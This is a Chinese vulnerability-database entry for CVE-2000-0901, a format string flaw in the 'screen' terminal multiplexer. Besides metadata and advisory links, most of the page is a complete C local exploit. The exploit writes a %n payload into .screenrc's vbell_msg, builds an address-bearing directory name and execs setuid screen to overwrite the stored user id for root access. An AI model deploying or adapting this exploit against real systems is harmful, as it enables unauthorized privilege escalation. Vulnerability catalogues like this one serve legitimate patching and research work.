screen格式字符串漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1105989 漏洞类型 格式化字符串
发布时间 2000-09-05 更新时间 2005-05-02
CVE编号 CVE-2000-0901 CNNVD-ID CNNVD-200012-148
漏洞平台 BSD CVSS评分 4.6
|漏洞来源
https://www.exploit-db.com/exploits/20191
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200012-148
|漏洞详情
screen3.9.5以及之前版本存在格式字符串漏洞。本地用户借助vbell_msg初始化变量中格式字符提升根目录特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/1641/info

Various format string vulnerabilities exist in versions 3.9.5 and prior of 'screen' that may allow local users to elevate their privileges. If screen is setuid root, it is possible to alter the contents of the variable which stores the user id.


/****************************************************************
*
*
*  Screen 3.7.6 (and others) local
exploit                                                                *

*  by
IhaQueR@IRCnet
*
*
*
****************************************************************/



#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>



#define TMPBUFSIZE 4096

#define SCREENRC "/usr/home/paul/.screenrc"
#define SCREEN "/usr/bin/screen"

#define AREP 1
#define BUFOFFSET 324
#define PADDING 3
#define WRITEADDR 0x807beb4


//  some offsets grabbed from 3.7.6
//  &real_uid, &real_gid, &eff_uid, &eff_gid own_uid
//  0x807beb4 0x807ab1c 0x807aab0 0x807aab4 0x807bea4
//  + 64  +64



int main(int argc, char** argv)
{
int i, l;
FILE* fp;
char buf[TMPBUFSIZE];
unsigned char adr[(AREP+2)*sizeof(unsigned)];
unsigned char* cp;
unsigned a, *p;


  if(argc != 2) {
   printf("USAGE %s offset\n", argv[0]);
   return 0;
  }

  l = atoi(argv[1]);
  printf("creating magic string\n");

  bzero(buf, TMPBUFSIZE);

/*  consume stack arguments */
  for(i=0; i<BUFOFFSET/4; i++)
   strcat(buf, "%.0d");

/*  finally write to adress */
//  for(i=0;i<9; i++)
   strcat(buf, "%n");

  if(fp = fopen(SCREENRC, "w")) {
   fprintf(fp, "vbell on\n");
   fprintf(fp, "vbell_msg '%s'\n", buf);
   fprintf(fp, "vbellwait 11111\n");
   fclose(fp);
  }
  else {
   printf("ERROR: opening %s\n", SCREENRC);
  }

/*  now create the magic dir... */
  bzero(adr, (AREP+2)*sizeof(unsigned));
  cp = adr;
  for(i=0; i<PADDING; i++) {
   *cp = 'p';
   cp++;
  }

  p = (unsigned*) cp;

  a = WRITEADDR;
  a = a + l;

  for(i=0; i<AREP; i++) {
   *p = a;
//   a += 4;
   p++;
  }

  *p = 0;

/* make dir and call screen */
  mkdir((char*)adr, 0x777);
  chdir((char*)adr);
  argv[1] = NULL;
  execv(SCREEN, argv);
}
|参考资料

来源:XF
名称:screen-format-string
链接:http://xforce.iss.net/static/5188.php
来源:BID
名称:1641
链接:http://www.securityfocus.com/bid/1641
来源:BUGTRAQ
名称:20000905screen3.9.5rootvulnerability
链接:http://www.securityfocus.com/archive/1/80178
来源:REDHAT
名称:RHSA-2000:058
链接:http://www.redhat.com/support/errata/RHSA-2000-058.html
来源:SUSE
名称:20000906screenformatstringparsingsecurityproblem
链接:http://www.novell.com/linux/security/advisories/adv6_draht_screen_txt.html
来源:MANDRAKE
名称:MDKSA-2000:044
链接:http://www.linux-mandrake.com/en/updates/MDKSA-2000-044.php3
来源:BUGTRAQ
名称:20000906Screen-3.7.6localcompromise
链接:http://archives.neohapsis.com/archives/bugtraq/2000-08/0530.html
来源:FREEBSD
名称:FreeBSD-SA-00:46
链接:ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:46.screen.asc